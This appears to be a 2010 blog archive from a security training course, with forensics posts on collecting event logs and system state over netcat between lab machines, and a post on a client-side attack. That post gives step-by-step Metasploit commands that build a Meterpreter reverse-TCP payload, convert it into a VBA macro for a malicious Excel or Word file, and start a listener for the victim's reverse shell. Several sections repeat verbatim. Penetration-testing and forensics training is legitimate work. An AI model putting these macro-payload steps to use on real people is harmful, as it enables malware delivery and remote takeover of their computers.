Dear All,
As of today. My personal blog has been moved to http://flexi-learn.blogspot.com
New posts will be updated soonest possible.
Monday, July 26, 2010
Thursday, June 24, 2010
Covert Analysis II (Forensics)
On LON-WEB1, open the Event Viewer mmc snap-in, select System Event then select Save Logfile As, save the system event with another name:
Example: C:\Backup\SysEvent-Backup.evt
from LON-WEB1, send the SysEvent-Backup.evt file to CHFI-XP2 machine:
D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt
from CHFI-XP2 machine, receive the file:
C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt
To analyze:
On CHFI-XP2, open Event Viewer and load the file to view the events.
Example: C:\Backup\SysEvent-Backup.evt
from LON-WEB1, send the SysEvent-Backup.evt file to CHFI-XP2 machine:
D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt
from CHFI-XP2 machine, receive the file:
C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt
To analyze:
On CHFI-XP2, open Event Viewer and load the file to view the events.
Overt Analysis (Forensics)
Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1).
Launch the mmc with runas:
C:\>runas /user:LON-WEB1\administrator "mmc"
Once mmc has been launch, connect to the evidence machine.
Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/
Launch the mmc with runas:
C:\>runas /user:LON-WEB1\administrator "mmc"
Once mmc has been launch, connect to the evidence machine.
Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/
Covert Analysis I (Forensics)
On CHFI-XP2, launch Netcat in Listening Mode:
C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt
On LON-WEB1, launch Netcat in Client Mode:
D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10
Display registry values:
D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10
If you need to launch Netcat from different directory,
access it by using this command:
D:\Forensics\>cd Sysinternalssuite
D:\Forensics\Sysintenalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
MyEvidence.txt is the file which will store the evidence collection.
C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt
On LON-WEB1, launch Netcat in Client Mode:
D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10
Display registry values:
D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10
If you need to launch Netcat from different directory,
access it by using this command:
D:\Forensics\>cd Sysinternalssuite
D:\Forensics\Sysintenalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
MyEvidence.txt is the file which will store the evidence collection.
Tuesday, May 18, 2010
Client-side Attack by Using Evil MS-Office Apps (Excel or Word)
Step 1: Create your own payload
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe
Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script
cd /pentest/exploits/framework3/tools
./exe2vba.rb /tmp/payload.exe /tmp/payload.vba
Step 3: Copy and Paste the contents of the payload to your evil file
Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.
Step 5: Wait for the reverse connection from the client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Friday, May 14, 2010
ECSA/LPT @ ECDC Photos
Guys, download our photos from here:
http://www.4shared.com/account/photo/pefTq93p/DSCN1014.html
http://www.4shared.com/account/photo/_AmTe_3S/DSCN1015.html
http://www.4shared.com/account/photo/pefTq93p/DSCN1014.html
http://www.4shared.com/account/photo/_AmTe_3S/DSCN1015.html
Subscribe to:
Posts (Atom)